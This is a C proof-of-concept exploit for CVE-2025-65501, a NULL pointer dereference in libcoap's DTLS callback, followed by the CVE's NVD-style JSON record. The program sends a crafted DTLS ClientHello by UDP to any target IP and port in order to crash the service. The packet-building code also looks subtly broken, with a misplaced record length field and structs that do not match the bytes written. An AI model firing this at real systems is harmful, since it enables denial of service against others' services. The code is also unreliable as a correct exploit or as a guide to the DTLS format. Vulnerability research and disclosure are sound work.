CVE-2025-65501

/* * CVE-2025-65501 PoC - libcoap DTLS NULL Pointer Dereference * This PoC demonstrates sending a malformed DTLS handshake to trigger * the NULL pointer dereference in coap_dtls_info_callback() * * Compile: gcc -o cve202565501_poc cve202565501_poc.c -lssl -lcrypto -lcoap-1 -DDEBUG * Usage: ./cve202565501_poc <target_ip> <target_port> */ #include <stdio.h> #include <string.h> #include <stdlib.h> #include <stdint.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> #include <openssl/ssl.h> #include <openssl/err.h> /* DTLS Record Layer Header */ typedef struct { uint8_t content_type; uint16_t message_seq; uint8_t fragment_offset[3]; uint8_t fragment_length[3]; } dtls_record_header_t; /* DTLS Handshake Header */ typedef struct { uint8_t handshake_type; uint8_t length[3]; uint16_t message_seq; uint8_t fragment_offset[3]; uint8_t fragment_length[3]; } dtls_handshake_header_t; void create_dtls_client_hello(uint8_t *packet, int *length) { /* DTLS Record: Handshake (22) */ packet[0] = 0x16; /* Handshake */ /* DTLS Version 1.2 */ packet[1] = 0xfe; packet[2] = 0xfd; /* Epoch (2 bytes) */ packet[3] = 0x00; packet[4] = 0x00; /* Sequence Number (6 bytes) */ packet[5] = 0x00; packet[6] = 0x00; packet[7] = 0x00; packet[8] = 0x00; packet[9] = 0x00; packet[10] = 0x01; /* Handshake Header starts at offset 11 */ int hs_offset = 11; /* Handshake Type: ClientHello (1) */ packet[hs_offset] = 0x01; /* Handshake Length (3 bytes) - set later */ packet[hs_offset + 1] = 0x00; packet[hs_offset + 2] = 0x00; packet[hs_offset + 3] = 0x00; /* Message Sequence */ packet[hs_offset + 4] = 0x00; packet[hs_offset + 5] = 0x00; /* Fragment Offset */ packet[hs_offset + 6] = 0x00; packet[hs_offset + 7] = 0x00; packet[hs_offset + 8] = 0x00; /* Fragment Length - set later */ packet[hs_offset + 9] = 0x00; packet[hs_offset + 10] = 0x00; packet[hs_offset + 11] = 0x00; int body_offset = hs_offset + 12; /* Client Version: DTLS 1.2 */ packet[body_offset] = 0xfe; packet[body_offset + 1] = 0xfd; /* Random (32 bytes) */ memset(&packet[body_offset + 2], 0x01, 32); /* Session ID Length */ packet[body_offset + 34] = 0x00; /* Cookie Length */ packet[body_offset + 35] = 0x00; /* Cipher Suites Length */ packet[body_offset + 36] = 0x00; packet[body_offset + 37] = 0x02; /* TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA (0xC014) */ packet[body_offset + 38] = 0xc0; packet[body_offset + 39] = 0x14; /* Compression Methods */ packet[body_offset + 40] = 0x01; packet[body_offset + 41] = 0x00; /* NULL compression */ /* Extensions Length */ packet[body_offset + 42] = 0x00; packet[body_offset + 43] = 0x00; int total_length = body_offset + 44; int handshake_length = total_length - hs_offset; /* Set handshake length */ packet[hs_offset + 1] = (handshake_length >> 16) & 0xff; packet[hs_offset + 2] = (handshake_length >> 8) & 0xff; packet[hs_offset + 3] = handshake_length & 0xff; /* Set fragment length */ packet[hs_offset + 9] = (handshake_length >> 16) & 0xff; packet[hs_offset + 10] = (handshake_length >> 8) & 0xff; packet[hs_offset + 11] = handshake_length & 0xff; /* Set record length */ packet[11 + handshake_length - 1 + 1] = 0x00; packet[12 + handshake_length - 1 + 1] = (handshake_length >> 8) & 0xff; packet[13 + handshake_length - 1 + 1] = handshake_length & 0xff; *length = 14 + handshake_length; } int main(int argc, char *argv[]) { if (argc != 3) { fprintf(stderr, "Usage: %s <target_ip> <target_port>\n", argv[0]); return 1; } const char *target_ip = argv[1]; int target_port = atoi(argv[2]); int sock = socket(AF_INET, SOCK_DGRAM, 0); if (sock < 0) { perror("socket"); return 1; } struct sockaddr_in target; memset(&target, 0, sizeof(target)); target.sin_family = AF_INET; target.sin_port = htons(target_port); inet_pton(AF_INET, target_ip, &target.sin_addr); uint8_t packet[1024]; int packet_len; printf("[*] Crafting malformed DTLS ClientHello for CVE-2025-65501\n"); create_dtls_client_hello(packet, &packet_len); printf("[*] Sending DTLS packet to %s:%d\n", target_ip, target_port); printf("[*] Packet size: %d bytes\n", packet_len); int sent = sendto(sock, packet, packet_len, 0, (struct sockaddr *)&target, sizeof(target)); if (sent < 0) { perror("sendto"); close(sock); return 1; } printf("[+] Malformed DTLS ClientHello sent successfully\n"); printf("[*] If target is vulnerable, it should crash with NULL pointer dereference\n"); close(sock); return 0; }

{"cve": {"id": "CVE-2025-65501", "sourceIdentifier": "[email protected]", "published": "2025-11-24T14:15:47.950", "lastModified": "2025-12-01T16:18:11.947", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Null pointer dereference in coap_dtls_info_callback() in OISM libcoap 4.3.5 allows remote attackers to cause a denial of service via a DTLS handshake where SSL_get_app_data() returns NULL."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:libcoap:libcoap:4.3.5:-:*:*:*:*:*:*", "matchCriteriaId": "78120234-9F76-4010-AD0E-FEA4DE8A76F9"}]}]}], "references": [{"url": "https://github.com/obgm/libcoap/issues/1748", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/obgm/libcoap/pull/1750", "source": "[email protected]", "tags": ["Issue Tracking"]}]}}